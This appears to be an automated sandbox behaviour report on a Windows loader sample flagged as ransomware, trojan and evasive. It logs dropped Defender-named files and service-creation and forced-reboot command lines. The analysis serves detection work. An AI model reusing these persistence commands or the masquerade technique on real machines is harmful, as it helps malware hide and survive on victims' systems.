          Source: svchost.exe, 00000004.00000003.1693238700.00000204770C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
          Source: svchost.exe, 00000004.00000003.1693238700.0000020477056000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
          Source: NisSrv.exe.11.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us
          Source: NisSrv.exe.11.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us
          Source: NisSrv.exe.11.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.usffl4unknownUriunsupportedserverCalluserActionhttps://europe.
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownHTTPS traffic detected: 52.95.163.114:443 -> 192.168.2.4:49735 version: TLS 1.2

          System Summary

          barindex
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\shutdown.exe C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 2_2_00007FFD9B8E8A002_2_00007FFD9B8E8A00
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 2_2_00007FFD9B8E0F182_2_00007FFD9B8E0F18
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 2_2_00007FFD9B90372D2_2_00007FFD9B90372D
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 2_2_00007FFD9B8E0F252_2_00007FFD9B8E0F25
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 2_2_00007FFD9B9047902_2_00007FFD9B904790
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeCode function: 3_2_00007FFD9B8D65F33_2_00007FFD9B8D65F3
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeCode function: 3_2_00007FFD9B8D2C813_2_00007FFD9B8D2C81
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041EB9447_2_041EB944
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0475579C11_2_0475579C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0463B94411_2_0463B944
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04755A5C11_2_04755A5C
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: Resource name: DATA type: Zip archive data, at least v2.0 to extract, compression method=deflate
          Source: NisSrv.exe.11.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
          Source: EppManifest.dll.mui.11.drStatic PE information: No import functions for PE file found
          Source: EppManifest.dll.mui0.11.drStatic PE information: No import functions for PE file found
          Source: MsMpLics.dll.11.drStatic PE information: No import functions for PE file found
          Source: MpAsDesc.dll.mui0.11.drStatic PE information: No import functions for PE file found
          Source: MsMpRes.dll.mui0.11.drStatic PE information: No import functions for PE file found
          Source: ProtectionManagement.dll.mui0.11.drStatic PE information: No import functions for PE file found
          Source: MpEvMsg.dll.11.drStatic PE information: No import functions for PE file found
          Source: EppManifest.dll.11.drStatic PE information: No import functions for PE file found
          Source: EppManifest.dll0.11.drStatic PE information: No import functions for PE file found
          Source: OfflineScannerShell.exe.mui0.11.drStatic PE information: No import functions for PE file found
          Source: MpEvMsg.dll.mui0.11.drStatic PE information: No import functions for PE file found
          Source: MpEvMsg.dll.mui.11.drStatic PE information: No import functions for PE file found
          Source: MsMpLics.dll0.11.drStatic PE information: No import functions for PE file found
          Source: Stand.exe.2.drStatic PE information: No import functions for PE file found
          Source: MpAsDesc.dll.11.drStatic PE information: No import functions for PE file found
          Source: shellext.dll.mui.11.drStatic PE information: No import functions for PE file found
          Source: OfflineScannerShell.exe.mui.11.drStatic PE information: No import functions for PE file found
          Source: ProtectionManagement.dll.mui.11.drStatic PE information: No import functions for PE file found
          Source: MpAsDesc.dll.mui.11.drStatic PE information: No import functions for PE file found
          Source: MsMpRes.dll.mui.11.drStatic PE information: No import functions for PE file found
          Source: shellext.dll.mui0.11.drStatic PE information: No import functions for PE file found
          Source: MsMpRes.dll.11.drStatic PE information: No import functions for PE file found
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, 00000001.00000003.1651338703.00000000025E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdate.exe2 vs WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, 00000001.00000003.1651338703.00000000025EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdate.exe2 vs WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeBinary or memory string: OriginalFilenameSetup.exe* vs WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Stand.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: MpRtp.dll.11.drBinary string: \\?\UNC\\\.\\\\\?\\Device\Mup\tsclient\HashDigestLengthObjectLengthS:P(TL;CIOI;0x%lx;;;%s)S:S-1-19-512-1536S-1-1-0
          Source: MpRtp.dll.11.drBinary string: uxX\Device\SftVol\\Device\MountPointManagerFile ID\\%s
          Source: MpRtp.dll.11.drBinary string: =6b\DEVICEfile\\.\transactionfilebootsamplefileexpensivesamplefilerequested%lu->%ld / %ld%c%ldremote%ld%cfixedremovable%ws / %wsnot boot%SystemDrive%Passthrough\SystemRoot\\Device\AUDIT{5737d832-9e2c-4922-9623-48a220290dcb}FolderGuardTargetPathFolderGuardTargetDiskFolderGuardId7m
          Source: MpCmdRun.exe.11.drBinary string: kernelbase.dllRaiseFailFastException%wswilstd::exception: %hsonecore\internal\sdk\inc\wil\opensource\wil\resource.h_p0WilError_03Bad optional accessamcore\antimalware\source\service\tools\mpcmdtool\mpperformancereport.cppProcessIdReasonPID\\?\\Device\\drivers\\FI_UNKNOWNerror: invalid data: System path changed during the trace from "%ls" to "%ls"
          Source: MpSvc.dll.11.drBinary string: 8\Device\Mup
          Source: MpRtp.dll.11.drBinary string: C:\Device\Mup
          Source: MpRtp.dll.11.drBinary string: \??\Volume\Device\LanmanRedirector\\Device\Harddisk\Device\CdRom\Device\Floppy\Device\WinDfs\\Device\RdpDr\\Device\WebDavRedirector\\Device\Mup\GetVolumePathNamesForVolumeNameW*?%ws%ws[Exclusion] %ls is discarded due to error %#lx best\Device\LanmanRedirector
          Source: classification engineClassification label: mal76.rans.troj.evad.winEXE@22/84@1/2
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\0Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\ExtraJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\.squirrel-lock-B35071413DA7AE3DB082CF25CF8755ACAD137999Jump to behavior
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower2
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeString found in binary or memory: DeploymentTool.exe\need dictionaryinvalid literal/length codeinvalid distance codeinvalid block typeinvalid stored block lengthstoo many length or distance symbolsinvalid bit length repeatoversubscribed dynamic bit lengths treeincomplete dynamic bit lengths treeoversubscribed literal/length treeincomplete literal/length treeoversubscribed distance treeincomplete distance treeempty distance tree with lengthsunknown compression methodinvalid window sizeincorrect header checkincorrect data check\..\\..//..//..\UT%s%s%s%s%sOpen Setup LogCloseInstallation has failedSquirrelSQUIRREL_TEMP%s%s\%sUnable to write to %s - IT policies may be restricting access to this folder\SquirrelTemp%s\SquirrelSetup.logDATAUpdate.exe"%s" --install . %sThere was an error while installing the application. Check the setup log for more information and contact the author.Failed to extract installervector<T> too longi
          Source: unknownProcess created: C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
          Source: unknownProcess created: C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe "C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe" --rerunningWithoutUAC
          Source: C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exeProcess created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess created: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe "C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe" --squirrel-firstrun
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower2
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower2
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\shutdown.exe C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
          Source: C:\Windows\SysWOW64\shutdown.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exeProcess created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUACJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess created: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe "C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe" --squirrel-firstrunJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower2Jump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower2Jump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" TowerJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= autoJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\shutdown.exe C:\WINDOWS\system32\shutdown.exe -r -t 1 -fJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
          Source: C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
          Source: Stand.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Extra\Stand.exe
          Source: Stand.lnk0.2.drLNK file: ..\AppData\Local\Extra\Stand.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ExtraJump to behavior
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic file information: File size 30540800 > 1048576
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1cf5600
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: MpSvc.pdbGCTL source: MpSvc.dll.11.dr
          Source: Binary string: ConfigSecurityPolicy.pdb source: ConfigSecurityPolicy.exe.11.dr
          Source: Binary string: NisSrv.pdb source: NisSrv.exe.11.dr
          Source: Binary string: MpAzSubmit.pdb source: MpAzSubmit.dll.11.dr
          Source: Binary string: MpCmdRun.pdbGCTL source: MpCmdRun.exe.11.dr
          Source: Binary string: netstandard.pdb.mdb source: Update.exe, 00000002.00000002.1701986264.000000001B4F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000002.00000000.1651849310.0000000000372000.00000002.00000001.01000000.00000005.sdmp, Update.exe.2.dr
          Source: Binary string: ConfigSecurityPolicy.pdbOGPS source: ConfigSecurityPolicy.exe.11.dr
          Source: Binary string: MpRTP.pdb source: MpRtp.dll.11.dr
          Source: Binary string: MpRTP.pdbGCTL source: MpRtp.dll.11.dr
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: Update.exe, 00000002.00000002.1700421994.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.00000000028D6000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: endpointdlp.pdb source: endpointdlp.dll.11.dr
          Source: Binary string: MpCmdRun.pdb source: MpCmdRun.exe.11.dr
          Source: Binary string: shellext.pdb source: shellext.dll.11.dr
          Source: Binary string: endpointdlp.pdbGCTL source: endpointdlp.dll.11.dr
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\Setup.pdb source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
          Source: Binary string: MpDetours.pdb source: MpDetours.dll.11.dr
          Source: Binary string: MpAzSubmit.pdbGCTL source: MpAzSubmit.dll.11.dr
          Source: Binary string: C:\Users\DeveloperSys\Desktop\Projetos C# para Loaders\Stand\obj\x64\Release\Stand.pdb source: Update.exe, 00000002.00000002.1700421994.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.00000000028B0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: MpDetours.pdbGCTL source: MpDetours.dll.11.dr
          Source: Binary string: MpCommu.pdb source: MpCommu.dll.11.dr
          Source: Binary string: MpCommu.pdbGCTL source: MpCommu.dll.11.dr
          Source: Binary string: shellext.pdbOGPS source: shellext.dll.11.dr
          Source: Binary string: C:\Users\DeveloperSys\Desktop\Projetos C# para Loaders\Stand\obj\x64\Release\Stand.pdbx source: Update.exe, 00000002.00000002.1700421994.00000000028F0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: NisSrv.pdbGCTL source: NisSrv.exe.11.dr
          Source: Binary string: C:\Users\DeveloperSys\Desktop\Projetos C# para Loaders\Stand\obj\x64\Release\Stand.pdbIvan Medvedev source: Update.exe, 00000002.00000002.1700421994.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.00000000028B0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: MpSvc.pdb source: MpSvc.dll.11.dr
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: Stand.exe.2.drStatic PE information: 0xFEB0BDAA [Thu May 28 23:15:54 2105 UTC]
          Source: diskres2.dll.3.drStatic PE information: section name: .didata
          Source: MpCmdRun.exe.11.drStatic PE information: section name: .didat
          Source: MpCommu.dll.11.drStatic PE information: section name: .didat
          Source: MpRtp.dll.11.drStatic PE information: section name: .didat
          Source: MpSvc.dll.11.drStatic PE information: section name: .didat
          Source: NisSrv.exe.11.drStatic PE information: section name: .didat
          Source: ProtectionManagement.dll.11.drStatic PE information: section name: .didat
          Source: MpCmdRun.exe0.11.drStatic PE information: section name: .didat
          Source: MpClient.dll.11.drStatic PE information: section name: _RDATA
          Source: MpCmdRun.dll.11.drStatic PE information: section name: .didata
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 2_2_00007FFD9B7CD2A5 pushad ; iretd 2_2_00007FFD9B7CD2A6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04204514 push ecx; mov dword ptr [esp], ecx7_2_04204518
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0421CFF0 push ecx; mov dword ptr [esp], eax7_2_0421CFF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F00B0 push 041F0133h; ret 7_2_041F012B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04205930 push ecx; mov dword ptr [esp], ecx7_2_04205933
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041EF95C push ecx; mov dword ptr [esp], edx7_2_041EF95D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041EF974 push ecx; mov dword ptr [esp], edx7_2_041EF975
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041EF968 push ecx; mov dword ptr [esp], edx7_2_041EF969
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041EF9BA push ecx; mov dword ptr [esp], edx7_2_041EF9BD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041EF9E0 push ecx; mov dword ptr [esp], edx7_2_041EF9E1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041EFA02 push ecx; mov dword ptr [esp], edx7_2_041EFA05
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_042B3AA4 push ecx; mov dword ptr [esp], edx7_2_042B3AA5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041EFAF4 push ecx; mov dword ptr [esp], edx7_2_041EFAF5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041EFB0C push ecx; mov dword ptr [esp], edx7_2_041EFB0D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041E7320 push ecx; mov dword ptr [esp], eax7_2_041E7321
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041EF344 push ecx; mov dword ptr [esp], edx7_2_041EF345
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0421FBD4 push ecx; mov dword ptr [esp], eax7_2_0421FBD5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0484991C push 04849962h; ret 11_2_0484995A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0472BAD4 push ecx; mov dword ptr [esp], eax11_2_0472BAD8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04655434 push ecx; mov dword ptr [esp], edx11_2_04655438
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04654514 push ecx; mov dword ptr [esp], ecx11_2_04654518
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_046400B0 push 04640133h; ret 11_2_0464012B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0463F344 push ecx; mov dword ptr [esp], edx11_2_0463F345
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04637320 push ecx; mov dword ptr [esp], eax11_2_04637321
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0472BE0C push ecx; mov dword ptr [esp], eax11_2_0472BE0E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0466CFF0 push ecx; mov dword ptr [esp], eax11_2_0466CFF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0465596C push ecx; mov dword ptr [esp], ecx11_2_04655970
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0463F968 push ecx; mov dword ptr [esp], edx11_2_0463F969
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0463F974 push ecx; mov dword ptr [esp], edx11_2_0463F975
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0463F95C push ecx; mov dword ptr [esp], edx11_2_0463F95D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04655930 push ecx; mov dword ptr [esp], ecx11_2_04655933
          Source: Stand.exe.2.drStatic PE information: section name: .text entropy: 7.877831282353793
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpRtp.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\RedistList\OfflineScannerShell.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\en-US\OfflineScannerShell.exe.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\pt-BR\MsMpRes.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\EppManifest.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\ProtectionManagement.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\en-US\shellext.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\Extra\Update.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\pt-BR\MpAsDesc.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\RedistList\MsMpLics.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\pt-BR\shellext.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpDetours.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpSvc.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\MsMpLics.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\en-US\ProtectionManagement.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\Extra\Stand.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\MsMpEng.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\pt-BR\OfflineScannerShell.exe.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\shellext.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeJump to dropped file
